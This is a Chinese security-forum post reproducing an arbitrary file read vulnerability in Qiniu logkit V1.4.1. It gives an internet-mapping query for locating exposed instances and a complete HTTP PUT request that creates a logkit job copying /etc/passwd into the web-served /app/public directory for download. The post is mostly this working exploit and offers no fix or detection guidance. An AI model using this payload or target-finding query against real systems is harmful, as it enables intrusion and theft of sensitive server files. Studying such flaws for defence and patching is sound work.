问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Qiniu logkit log_path 任意文件读取漏洞
# Qiniu logkit log_path 任意文件读取漏洞 ## 漏洞描述 Qiniu logkit log_path 参数可自定义读取服务器文件,配合读取的文件写入Web目录将会使攻击者读取到服务器任意文件,造成服务器敏...
Qiniu logkit log\_path 任意文件读取漏洞 =============================== 漏洞描述 ---- Qiniu logkit log\_path 参数可自定义读取服务器文件,配合读取的文件写入Web目录将会使攻击者读取到服务器任意文件,造成服务器敏感信息泄漏 漏洞影响 ---- Qiniu logkit V1.4.1 网络测绘 ---- title="七牛Logkit配置文件助手" 漏洞复现 ---- 主页面 ![img](https://shs3.b.qianxin.com/butian_public/f60925503cfbc764f1a5b3adce1195a11181b18b1fe95.jpg) 发送请求包配置读取文件 ```php PUT /logkit/configs/passwdread HTTP/1.1 Host: Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Content-Length: 356 Content-Type: application/json User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 { "name": "passwdread", "batch_interval": 1, "collect_interval": 1, "reader": { "mode": "file", "log_path": "/etc/passwd", "read_from": "oldest", "datasource_tag": "datasource", "encoding": "UTF-8" }, "parser": { "type": "raw", "name": "parser", "timestamp": "true" }, "transforms": [], "senders": [ { "sender_type": "file", "file_send_path": "/app/public/passwd.log" } ] } ``` ![img](https://shs3.b.qianxin.com/butian_public/f167084eff814c44a0b3e715ae44df8b5e75e037db249.jpg) ![img](https://shs3.b.qianxin.com/butian_public/f7792501b4f55028705790b3c513f25078b479c3aa71b.jpg) 请求读取的文件 /app/public 目录为Docker默认Web路径,写入可读取目标文件 ![img](https://shs3.b.qianxin.com/butian_public/f570059f819a08b29110f9ee72a265c38ac50f5137d0f.jpg)
发表于 2024-07-12 18:47:23
阅读 ( 926 )
分类:
Web应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!